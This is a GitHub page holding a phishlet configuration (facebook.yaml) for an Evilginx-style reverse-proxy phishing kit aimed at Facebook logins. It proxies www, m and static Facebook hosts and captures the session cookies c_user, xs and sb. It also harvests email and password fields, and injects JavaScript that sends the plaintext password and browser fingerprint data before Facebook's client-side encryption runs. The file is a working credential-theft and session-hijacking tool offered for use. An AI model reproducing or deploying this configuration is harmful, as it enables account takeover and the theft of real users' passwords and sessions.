-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathfacebook.yaml
132 lines (117 loc) · 6.43 KB
/
facebook.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
author: 't.me/pysmart'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true}
- {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false}
- {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false}
sub_filters:
- {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
- {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
- {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
- {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
- {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
- {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
- {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
- {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']}
auth_tokens:
- domain: '.facebook.com'
keys: ['c_user','xs','sb']
credentials:
username:
key: 'email'
search: '(.*)'
type: 'post'
password:
key: '^unenc_password$'
search: '(.*)'
type: 'post'
#Custom parameters are added in order to grab the requests made by javascripts injected in order to get device user-agent and other details.
# key: 'pass' is added in order to increase the chances of grabbing the pass field if in case failed from above.
custom:
- key: '^pass$'
search: '(.*)'
type: 'post'
- key: '^Password$'
search: '(.*)'
type: 'post'
- key: 'UserAgent'
search: '(.*)'
type: 'post'
- key: 'Browser'
search: '(.*)'
type: 'post'
- key: 'Engine'
search: '(.*)'
type: 'post'
- key: 'Platform'
search: '(.*)'
type: 'post'
login:
domain: 'www.facebook.com'
path: '/login.php'
#Below Javascript function will do two things (1) on page load it will make 4 request back to server to let us capture the important data. (2) Will add a function to login button to leak the value of password field.
js_inject:
- trigger_domains: ["www.facebook.com"]
trigger_paths: ["/login.php", "/login/device-based/regular/login/", "/login/*"] #The target path is important as the javascript will be injected in all address pages started with /login
trigger_params: []
script: |
function onclickListener(){
var submit = document.querySelectorAll('button[type=submit]')[0];
submit.setAttribute("onclick", "sendPass()");
var useragent = navigator.userAgent;
xhr.open("POST", '/', true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("UserAgent="+encodeURIComponent(useragent));
var browser = navigator.appName;
xhr.open("POST", '/', true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("Browser="+encodeURIComponent(browser));
var engine = navigator.product;
xhr.open("POST", '/', true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("Engine="+encodeURIComponent(engine));
var platform = navigator.platform;
var xhr = new XMLHttpRequest();
xhr.open("POST", '/', true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("Platform="+encodeURIComponent(platform));
return;
}
function sendPass(){
var password = document.getElementsByName("pass")[0].value;
var xhr = new XMLHttpRequest();
xhr.open("POST", '/login/device-based/regular/login/', true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("unenc_password="+encodeURIComponent(password));
return;
}
setTimeout(function(){ onclickListener(); }, 1000);
# UPDATE : LOOKS LIKE FACEBOOK HAS CHANGED THE JAVASCRIPT FUNCTION, STILL THE FILTERS WORKS SOMETIME , SO I LEFT THEM AS THEY WERE IN PREVIOUS PHISHLET I MADE.
# The js Function Responsible For Password Encryption is Present in this js file Located At : https://static.xx.fbcdn.net/rsrc.php/v3/y4/r/yEB-M5_vVi6.js?_nc_x=Ij3Wp8lg5Kz
#
# _encryptBeforeSending: function (a) {
# var c = this;
# a = a.bind(this);
# var d = this.loginFormParams && this.loginFormParams.pubKey;
# if ((window.crypto || window.msCrypto) && d) {
# var e = b('DOM').scry(this.loginForm, 'input[id="pass"]') [0],
# f = b('FBBrowserPasswordEncryption'),
# g = Math.floor(Date.now() / 1000).toString();
# b('promiseDone') (f.encryptPassword(d.keyId, d.publicKey, e.value, g), function (d) {
# d = b('DOM').create('input', {
# type: 'hidden',
# name: 'ep',
# value: d
# });
# c.loginForm.appendChild(d);
# e.disabled = !0;
# a()
# }, function (c) {
# var d = '#PWD_BROWSER',
# e = 5,
# f = b('LoginServicePasswordEncryptDecryptEventTypedLogger');
# new f().setError('BrowserEncryptionFailureInLoginFormControllerWWW').setGrowthFlow('Bluebar/main login WWW').setErrorMessage(c.message).setPasswordTag(d).setPasswordEncryptionVersion(e).setPasswordTimestamp(g).logVital();
# a()
# })
# } else a()
# },